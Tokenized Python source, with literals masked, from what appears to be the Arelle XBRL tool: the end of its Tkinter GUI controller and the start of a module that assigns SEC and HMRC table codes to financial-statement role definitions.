isMSW : adjustW = <NUM_LIT:4> ; adjustH = <NUM_LIT:6> <EOL> elif self . isMac : adjustW = <NUM_LIT> ; adjustH = <NUM_LIT> <EOL> else : adjustW = <NUM_LIT:2> ; adjustH = <NUM_LIT:2> <EOL> self . config [ "<STR_LIT>" ] = ( self . tabWinTopLeft . winfo_width ( ) - adjustW , <EOL> self . tabWinTopLeft . winfo_height ( ) - adjustH ) <EOL> super ( CntlrWinMain , self ) . close ( saveConfig = True ) <EOL> self . parent . unbind_all ( ( ) ) <EOL> self . parent . destroy ( ) <EOL> if self . logFile : <EOL> self . logFile . close ( ) <EOL> self . logFile = None <EOL> def restart ( self , event = None ) : <EOL> self . quit ( event , restartAfterQuit = True ) <EOL> def setWorkOffline ( self , * args ) : <EOL> self . webCache . workOffline = self . workOffline . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . webCache . workOffline <EOL> self . saveConfig ( ) <EOL> def confirmClearWebCache ( self ) : <EOL> if tkinter . messagebox . askyesno ( <EOL> _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) : <EOL> def backgroundClearCache ( ) : <EOL> self . showStatus ( _ ( "<STR_LIT>" ) ) <EOL> self . webCache . clear ( ) <EOL> self . showStatus ( _ ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> thread = threading . Thread ( target = lambda : backgroundClearCache ( ) ) <EOL> thread . daemon = True <EOL> thread . start ( ) <EOL> def manageWebCache ( self ) : <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> command = '<STR_LIT>' <EOL> elif sys . platform in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> command = '<STR_LIT>' <EOL> else : <EOL> command = '<STR_LIT>' <EOL> try : <EOL> subprocess . Popen ( [ command , self . webCache . cacheDir ] ) <EOL> except : <EOL> pass <EOL> def setupProxy ( self ) : <EOL> from arelle . DialogUserPassword import askProxy <EOL> proxySettings = askProxy ( self . parent , self . config . get ( "<STR_LIT>" ) ) <EOL> if proxySettings : <EOL> self . webCache . resetProxies ( proxySettings ) <EOL> self . 
config [ "<STR_LIT>" ] = proxySettings <EOL> self . saveConfig ( ) <EOL> def setValidateDisclosureSystem ( self , * args ) : <EOL> self . modelManager . validateDisclosureSystem = self . validateDisclosureSystem . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateDisclosureSystem <EOL> self . saveConfig ( ) <EOL> if self . modelManager . validateDisclosureSystem : <EOL> if not self . modelManager . disclosureSystem or not self . modelManager . disclosureSystem . selection : <EOL> self . selectDisclosureSystem ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def selectDisclosureSystem ( self , * args ) : <EOL> from arelle import DialogOpenArchive <EOL> self . config [ "<STR_LIT>" ] = DialogOpenArchive . selectDisclosureSystem ( self , self . modelManager . disclosureSystem ) <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def formulaParametersDialog ( self , * args ) : <EOL> DialogFormulaParameters . getParameters ( self ) <EOL> self . setValidateTooltipText ( ) <EOL> def rssWatchOptionsDialog ( self , * args ) : <EOL> from arelle import DialogRssWatch <EOL> DialogRssWatch . getOptions ( self ) <EOL> def rssWatchControl ( self , start = False , stop = False , close = False ) : <EOL> from arelle . ModelDocument import Type <EOL> from arelle import WatchRss <EOL> if not self . modelManager . rssWatchOptions . get ( "<STR_LIT>" ) : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> parent = self . parent ) <EOL> return False <EOL> rssModelXbrl = None <EOL> for loadedModelXbrl in self . modelManager . loadedModelXbrls : <EOL> if ( loadedModelXbrl . modelDocument . type == Type . RSSFEED and <EOL> loadedModelXbrl . modelDocument . uri == self . modelManager . rssWatchOptions . get ( "<STR_LIT>" ) ) : <EOL> rssModelXbrl = loadedModelXbrl <EOL> break <EOL> if start : <EOL> if not rssModelXbrl : <EOL> rssModelXbrl = self . modelManager . create ( Type . RSSFEED , self . 
modelManager . rssWatchOptions . get ( "<STR_LIT>" ) ) <EOL> self . showLoadedXbrl ( rssModelXbrl , False ) <EOL> if not hasattr ( rssModelXbrl , "<STR_LIT>" ) : <EOL> WatchRss . initializeWatcher ( rssModelXbrl ) <EOL> rssModelXbrl . watchRss . start ( ) <EOL> elif stop : <EOL> if rssModelXbrl and rssModelXbrl . watchRss : <EOL> rssModelXbrl . watchRss . stop ( ) <EOL> def rssWatchUpdateOption ( self , latestPubDate = None ) : <EOL> self . uiThreadQueue . put ( ( self . uiRssWatchUpdateOption , [ latestPubDate ] ) ) <EOL> def uiRssWatchUpdateOption ( self , latestPubDate ) : <EOL> if latestPubDate : <EOL> self . modelManager . rssWatchOptions [ "<STR_LIT>" ] = latestPubDate <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . rssWatchOptions <EOL> self . saveConfig ( ) <EOL> def languagesDialog ( self , * args ) : <EOL> override = self . lang if self . lang != self . modelManager . defaultLang else "<STR_LIT>" <EOL> import tkinter . simpledialog <EOL> newValue = tkinter . simpledialog . askstring ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( <EOL> self . modelManager . defaultLang , override ) , <EOL> parent = self . parent ) <EOL> if newValue is not None : <EOL> self . config [ "<STR_LIT>" ] = newValue <EOL> if newValue : <EOL> self . lang = newValue <EOL> else : <EOL> self . lang = self . modelManager . defaultLang <EOL> if self . modelManager . modelXbrl and self . modelManager . modelXbrl . modelDocument : <EOL> self . showLoadedXbrl ( self . modelManager . modelXbrl , True ) <EOL> self . saveConfig ( ) <EOL> def setValidateTooltipText ( self ) : <EOL> if self . modelManager . modelXbrl and not self . modelManager . modelXbrl . isClosed and self . modelManager . modelXbrl . modelDocument is not None : <EOL> valType = self . modelManager . modelXbrl . modelDocument . type <EOL> if valType in ( ModelDocument . Type . SCHEMA , ModelDocument . Type . 
LINKBASE ) : <EOL> valName = "<STR_LIT>" <EOL> else : <EOL> valName = ModelDocument . Type . typeName [ valType ] <EOL> if valType == ModelDocument . Type . VERSIONINGREPORT : <EOL> v = _ ( "<STR_LIT>" ) <EOL> else : <EOL> if self . modelManager . validateCalcLB : <EOL> if self . modelManager . validateInferDecimals : <EOL> c = _ ( "<STR_LIT>" ) <EOL> else : <EOL> c = _ ( "<STR_LIT>" ) <EOL> else : <EOL> c = "<STR_LIT>" <EOL> if self . modelManager . validateUtr : <EOL> u = _ ( "<STR_LIT>" ) <EOL> else : <EOL> u = "<STR_LIT>" <EOL> if self . modelManager . validateDisclosureSystem : <EOL> v = _ ( "<STR_LIT>" ) . format ( <EOL> valName , self . modelManager . disclosureSystem . selection , c , u ) <EOL> else : <EOL> v = _ ( "<STR_LIT>" ) . format ( valName , c , u ) <EOL> else : <EOL> v = _ ( "<STR_LIT>" ) <EOL> self . validateTooltipText . set ( v ) <EOL> def setValidateCalcLB ( self , * args ) : <EOL> self . modelManager . validateCalcLB = self . validateCalcLB . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateCalcLB <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def setValidateInferDecimals ( self , * args ) : <EOL> self . modelManager . validateInferDecimals = self . validateInferDecimals . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateInferDecimals <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def setValidateUtr ( self , * args ) : <EOL> self . modelManager . validateUtr = self . validateUtr . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . validateUtr <EOL> self . saveConfig ( ) <EOL> self . setValidateTooltipText ( ) <EOL> def setCollectProfileStats ( self , * args ) : <EOL> self . modelManager . collectProfileStats = self . collectProfileStats . get ( ) <EOL> self . config [ "<STR_LIT>" ] = self . modelManager . collectProfileStats <EOL> self . saveConfig ( ) <EOL> def setShowDebugMessages ( self , * args ) : <EOL> self . 
config [ "<STR_LIT>" ] = self . showDebugMessages . get ( ) <EOL> self . saveConfig ( ) <EOL> def find ( self , * args ) : <EOL> from arelle . DialogFind import find <EOL> find ( self ) <EOL> def helpAbout ( self , event = None ) : <EOL> from arelle import DialogAbout , Version <EOL> from lxml import etree <EOL> DialogAbout . about ( self . parent , <EOL> _ ( "<STR_LIT>" ) , <EOL> os . path . join ( self . imagesDir , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> . format ( self . __version__ , self . systemWordSize , Version . version , <EOL> _ ( "<STR_LIT>" ) if self . hasWebServer else "<STR_LIT>" , <EOL> sys . version_info , etree . LXML_VERSION ) ) <EOL> def addToLog ( self , message , messageCode = "<STR_LIT>" , messageArgs = None , file = "<STR_LIT>" , refs = [ ] , level = logging . INFO ) : <EOL> if level == logging . DEBUG and not self . showDebugMessages . get ( ) : <EOL> return <EOL> if messageCode and messageCode not in message : <EOL> message = "<STR_LIT>" . format ( messageCode , message ) <EOL> if refs : <EOL> message += "<STR_LIT>" + Cntlr . logRefsFileLines ( refs ) <EOL> elif file : <EOL> if isinstance ( file , ( tuple , list , set ) ) : <EOL> message += "<STR_LIT>" + "<STR_LIT:U+002CU+0020>" . join ( file ) <EOL> elif isinstance ( file , _STR_BASE ) : <EOL> message += "<STR_LIT>" + file <EOL> if isinstance ( messageArgs , dict ) : <EOL> message = message % messageArgs <EOL> self . uiThreadQueue . put ( ( self . uiAddToLog , [ message ] ) ) <EOL> def uiAddToLog ( self , message ) : <EOL> try : <EOL> self . logView . append ( message ) <EOL> except : <EOL> pass <EOL> def logClear ( self , * ignore ) : <EOL> self . logView . 
clear ( ) <EOL> def logSelect ( self , * ignore ) : <EOL> self . logView . select ( ) <EOL> def logSaveToFile ( self , * ignore ) : <EOL> filename = self . uiFileDialog ( "<STR_LIT>" , <EOL> title = _ ( "<STR_LIT>" ) , <EOL> initialdir = "<STR_LIT:.>" , <EOL> filetypes = [ ( _ ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> defaultextension = "<STR_LIT>" ) <EOL> if not filename : <EOL> return False <EOL> try : <EOL> self . logView . saveToFile ( filename ) <EOL> except ( IOError , EnvironmentError ) as err : <EOL> tkinter . messagebox . showwarning ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( <EOL> filename , err ) , <EOL> parent = self . parent ) <EOL> return True ; <EOL> def viewModelObject ( self , modelXbrl , objectId ) : <EOL> self . waitForUiThreadQueue ( ) <EOL> self . uiThreadQueue . put ( ( self . uiViewModelObject , [ modelXbrl , objectId ] ) ) <EOL> def uiViewModelObject ( self , modelXbrl , objectId ) : <EOL> modelXbrl . viewModelObject ( objectId ) <EOL> def reloadViews ( self , modelXbrl ) : <EOL> self . uiThreadQueue . put ( ( self . uiReloadViews , [ modelXbrl ] ) ) <EOL> def uiReloadViews ( self , modelXbrl ) : <EOL> for view in modelXbrl . views : <EOL> view . view ( ) <EOL> def showStatus ( self , message , clearAfter = None ) : <EOL> self . uiThreadQueue . put ( ( self . uiShowStatus , [ message , clearAfter ] ) ) <EOL> def uiClearStatusTimerEvent ( self ) : <EOL> if self . statusbarTimerId : <EOL> self . statusbar [ "<STR_LIT:text>" ] = "<STR_LIT>" <EOL> self . statusbarTimerId = None <EOL> def uiShowStatus ( self , message , clearAfter = None ) : <EOL> if self . statusbarTimerId : <EOL> self . statusbarTimerId = None <EOL> self . statusbar [ "<STR_LIT:text>" ] = message <EOL> if clearAfter is not None and clearAfter > <NUM_LIT:0> : <EOL> self . statusbarTimerId = self . statusbar . after ( clearAfter , self . uiClearStatusTimerEvent ) <EOL> def internet_user_password ( self , host , realm ) : <EOL> from arelle . 
DialogUserPassword import askUserPassword <EOL> untilDone = threading . Event ( ) <EOL> result = [ ] <EOL> self . uiThreadQueue . put ( ( askUserPassword , [ self . parent , host , realm , untilDone , result ] ) ) <EOL> untilDone . wait ( ) <EOL> return result [ <NUM_LIT:0> ] <EOL> def internet_logon ( self , url , quotedUrl , dialogCaption , dialogText ) : <EOL> from arelle . DialogUserPassword import askInternetLogon <EOL> untilDone = threading . Event ( ) <EOL> result = [ ] <EOL> self . uiThreadQueue . put ( ( askInternetLogon , [ self . parent , url , quotedUrl , dialogCaption , dialogText , untilDone , result ] ) ) <EOL> untilDone . wait ( ) <EOL> return result [ <NUM_LIT:0> ] <EOL> def waitForUiThreadQueue ( self ) : <EOL> for i in range ( <NUM_LIT> ) : <EOL> if self . uiThreadQueue . empty ( ) : <EOL> break <EOL> time . sleep ( <NUM_LIT> ) <EOL> def uiThreadChecker ( self , widget , delayMsecs = <NUM_LIT:100> ) : <EOL> while not self . uiThreadQueue . empty ( ) : <EOL> try : <EOL> ( callback , args ) = self . uiThreadQueue . get ( block = False ) <EOL> except queue . Empty : <EOL> pass <EOL> else : <EOL> callback ( * args ) <EOL> widget . after ( delayMsecs , lambda : self . uiThreadChecker ( widget ) ) <EOL> def uiFileDialog ( self , action , title = None , initialdir = None , filetypes = [ ] , defaultextension = None , owner = None , multiple = False , parent = None ) : <EOL> if parent is None : parent = self . parent <EOL> if multiple and action == "<STR_LIT>" : <EOL> multFileNames = tkinter . filedialog . askopenfilename ( <EOL> multiple = True , <EOL> title = title , <EOL> initialdir = initialdir , <EOL> filetypes = [ ] if self . isMac else filetypes , <EOL> defaultextension = defaultextension , <EOL> parent = parent ) <EOL> if self . isMac : <EOL> return multFileNames <EOL> return re . findall ( "<STR_LIT>" , <EOL> multFileNames ) <EOL> elif self . 
hasWin32gui : <EOL> import win32gui <EOL> try : <EOL> filename , filter , flags = { "<STR_LIT>" : win32gui . GetOpenFileNameW , <EOL> "<STR_LIT>" : win32gui . GetSaveFileNameW } [ action ] ( <EOL> hwndOwner = ( owner if owner else parent ) . winfo_id ( ) , <EOL> hInstance = win32gui . GetModuleHandle ( None ) , <EOL> Filter = '<STR_LIT>' . join ( e for t in filetypes + [ '<STR_LIT>' ] for e in t ) , <EOL> MaxFile = <NUM_LIT> , <EOL> InitialDir = initialdir , <EOL> Title = title , <EOL> DefExt = defaultextension ) <EOL> return filename <EOL> except win32gui . error : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return { "<STR_LIT>" : tkinter . filedialog . askopenfilename , <EOL> "<STR_LIT>" : tkinter . filedialog . asksaveasfilename } [ action ] ( <EOL> title = title , <EOL> initialdir = initialdir , <EOL> filetypes = [ ] if self . isMac else filetypes , <EOL> defaultextension = defaultextension , <EOL> parent = parent ) <EOL> from arelle import DialogFormulaParameters <EOL> class WinMainLogHandler ( logging . Handler ) : <EOL> def __init__ ( self , cntlr ) : <EOL> super ( WinMainLogHandler , self ) . __init__ ( ) <EOL> self . cntlr = cntlr <EOL> formatter = Cntlr . LogFormatter ( "<STR_LIT>" ) <EOL> self . setFormatter ( formatter ) <EOL> def flush ( self ) : <EOL> '''<STR_LIT>''' <EOL> def emit ( self , logRecord ) : <EOL> msg = self . format ( logRecord ) <EOL> try : <EOL> self . cntlr . addToLog ( msg , level = logRecord . levelno ) <EOL> except : <EOL> pass <EOL> class TkinterCallWrapper : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func , subst , widget ) : <EOL> """<STR_LIT>""" <EOL> self . func = func <EOL> self . subst = subst <EOL> self . widget = widget <EOL> def __call__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if self . subst : <EOL> args = self . subst ( * args ) <EOL> return self . 
func ( * args ) <EOL> except SystemExit as msg : <EOL> raise SystemExit ( msg ) <EOL> except Exception : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> msg = '<STR_LIT>' . join ( traceback . format_exception_only ( exc_type , exc_value ) ) <EOL> tracebk = '<STR_LIT>' . join ( traceback . format_tb ( exc_traceback , limit = <NUM_LIT:7> ) ) <EOL> tkinter . messagebox . showerror ( _ ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) . format ( msg , tracebk ) ) <EOL> def main ( ) : <EOL> global restartMain <EOL> while restartMain : <EOL> restartMain = False <EOL> application = Tk ( ) <EOL> cntlrWinMain = CntlrWinMain ( application ) <EOL> application . protocol ( "<STR_LIT>" , cntlrWinMain . quit ) <EOL> if sys . platform == "<STR_LIT>" and not __file__ . endswith ( "<STR_LIT>" ) : <EOL> application . lift ( ) <EOL> application . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' , '<STR_LIT>' , True ) <EOL> cntlrWinMain . uiThreadQueue . put ( ( application . call , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' , '<STR_LIT>' , False ] ) ) <EOL> os . system ( '''<STR_LIT>''' ) <EOL> application . mainloop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if os . getenv ( "<STR_LIT>" ) : <EOL> from arelle import CntlrCmdLine <EOL> CntlrCmdLine . main ( ) <EOL> else : <EOL> main ( ) </s>
<s> '''<STR_LIT>''' <EOL> try : <EOL> import regex as re <EOL> except ImportError : <EOL> import re <EOL> from collections import defaultdict <EOL> import os , io , json <EOL> from datetime import datetime , timedelta <EOL> from arelle import XbrlConst <EOL> from arelle . ModelDtsObject import ModelConcept <EOL> STMT = r"<STR_LIT>" <EOL> notDET = r"<STR_LIT>" <EOL> notCMPRH = r"<STR_LIT>" <EOL> isCMPRH = r"<STR_LIT>" <EOL> '''<STR_LIT>''' <EOL> rePARENTHETICAL = r"<STR_LIT>" <EOL> notPAR = "<STR_LIT>" + rePARENTHETICAL + "<STR_LIT:)>" <EOL> isPAR = "<STR_LIT>" + rePARENTHETICAL + "<STR_LIT:)>" <EOL> UGT_TOPICS = None <EOL> def RE ( * args ) : <EOL> return re . compile ( '<STR_LIT>' . join ( args ) , re . IGNORECASE ) <EOL> EFMtableCodes = [ <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR ) , ( "<STR_LIT>" , ) ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , 
notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , notCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , notCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , isCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , isCMPRH , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , 
r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , notPAR , r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( STMT , notDET , isPAR , r"<STR_LIT>" ) , None ) <EOL> ] <EOL> HMRCtableCodes = [ <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ( "<STR_LIT>" , RE ( r"<STR_LIT>" ) , None ) , <EOL> ] <EOL> def evaluateRoleTypesTableCodes ( modelXbrl ) : <EOL> disclosureSystem = modelXbrl . modelManager . disclosureSystem <EOL> if disclosureSystem . validationType in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> detectMultipleOfCode = False <EOL> if disclosureSystem . validationType == "<STR_LIT>" : <EOL> tableCodes = list ( EFMtableCodes ) <EOL> detectMultipleOfCode = any ( v and any ( v . startswith ( dt ) for dt in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for docTypeConcept in modelXbrl . nameConcepts . 
get ( '<STR_LIT>' , ( ) ) <EOL> for docTypeFact in modelXbrl . factsByQname . get ( docTypeConcept . qname , ( ) ) <EOL> for v in ( docTypeFact . value , ) ) <EOL> elif disclosureSystem . validationType == "<STR_LIT>" : <EOL> tableCodes = list ( HMRCtableCodes ) <EOL> codeRoleURI = { } <EOL> roleURICode = { } <EOL> roleTypes = [ roleType <EOL> for roleURI in modelXbrl . relationshipSet ( XbrlConst . parentChild ) . linkRoleUris <EOL> for roleType in modelXbrl . roleTypes . get ( roleURI , ( ) ) ] <EOL> roleTypes . sort ( key = lambda roleType : roleType . definition ) <EOL> for roleType in roleTypes : <EOL> definition = roleType . definition <EOL> rootConcepts = None <EOL> for i , tableCode in enumerate ( tableCodes ) : <EOL> code , pattern , rootConceptNames = tableCode <EOL> if ( detectMultipleOfCode or code not in codeRoleURI ) and pattern . match ( definition ) : <EOL> if rootConceptNames and rootConcepts is None : <EOL> rootConcepts = modelXbrl . relationshipSet ( XbrlConst . parentChild , roleType . roleURI ) . rootConcepts <EOL> if ( not rootConceptNames or <EOL> any ( rootConcept . name in rootConceptNames for rootConcept in rootConcepts ) ) : <EOL> codeRoleURI [ code ] = roleType . roleURI <EOL> roleURICode [ roleType . roleURI ] = code <EOL> if not detectMultipleOfCode : <EOL> del tableCodes [ i ] <EOL> break <EOL> for roleTypes in modelXbrl . roleTypes . values ( ) : <EOL> for roleType in roleTypes : <EOL> roleType . _tableCode = roleURICode . get ( roleType . roleURI ) <EOL> else : <EOL> for roleTypes in modelXbrl . roleTypes . values ( ) : <EOL> for roleType in roleTypes : <EOL> roleType . _tableCode = None <EOL> def evaluateTableIndex ( modelXbrl ) : <EOL> disclosureSystem = modelXbrl . modelManager . disclosureSystem <EOL> if disclosureSystem . 
validationType == "<STR_LIT>" : <EOL> COVER = "<STR_LIT>" <EOL> STMTS = "<STR_LIT>" <EOL> NOTES = "<STR_LIT>" <EOL> POLICIES = "<STR_LIT>" <EOL> TABLES = "<STR_LIT>" <EOL> DETAILS = "<STR_LIT>" <EOL> UNCATEG = "<STR_LIT>" <EOL> roleDefinitionPattern = re . compile ( r"<STR_LIT>" ) <EOL> definitionElrs = dict ( ( roleType . definition , roleType ) <EOL> for roleURI in modelXbrl . relationshipSet ( XbrlConst . parentChild ) . linkRoleUris <EOL> for roleType in modelXbrl . roleTypes . get ( roleURI , ( ) ) ) <EOL> isRR = any ( ns . startswith ( "<STR_LIT>" ) for ns in modelXbrl . namespaceDocs . keys ( ) if ns ) <EOL> tableGroup = None <EOL> firstTableLinkroleURI = None <EOL> firstDocumentLinkroleURI = None <EOL> sortedRoleTypes = sorted ( definitionElrs . items ( ) , key = lambda item : item [ <NUM_LIT:0> ] ) <EOL> for roleDefinition , roleType in sortedRoleTypes : <EOL> roleType . _tableChildren = [ ] <EOL> match = roleDefinitionPattern . match ( roleDefinition ) if roleDefinition else None <EOL> if not match : <EOL> roleType . _tableIndex = ( UNCATEG , "<STR_LIT>" , roleType . roleURI ) <EOL> continue <EOL> seq , tblType , tblName = match . 
groups ( ) <EOL> if isRR : <EOL> tableGroup = COVER <EOL> elif not tableGroup : <EOL> tableGroup = ( "<STR_LIT>" in tblName and COVER or tblType == "<STR_LIT>" and STMTS or <EOL> "<STR_LIT>" in tblName and NOTES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or COVER ) <EOL> elif tableGroup == COVER : <EOL> tableGroup = ( tblType == "<STR_LIT>" and STMTS or "<STR_LIT>" in tblName and COVER or <EOL> "<STR_LIT>" in tblName and NOTES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or NOTES ) <EOL> elif tableGroup == STMTS : <EOL> tableGroup = ( ( tblType == "<STR_LIT>" or "<STR_LIT>" in tblName ) and STMTS or <EOL> "<STR_LIT>" in tblName and NOTES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or NOTES ) <EOL> elif tableGroup == NOTES : <EOL> tableGroup = ( "<STR_LIT>" in tblName and POLICIES or "<STR_LIT>" in tblName and TABLES or <EOL> "<STR_LIT>" in tblName and DETAILS or tblType == "<STR_LIT>" and NOTES or UNCATEG ) <EOL> elif tableGroup == POLICIES : <EOL> tableGroup = ( "<STR_LIT>" in tblName and 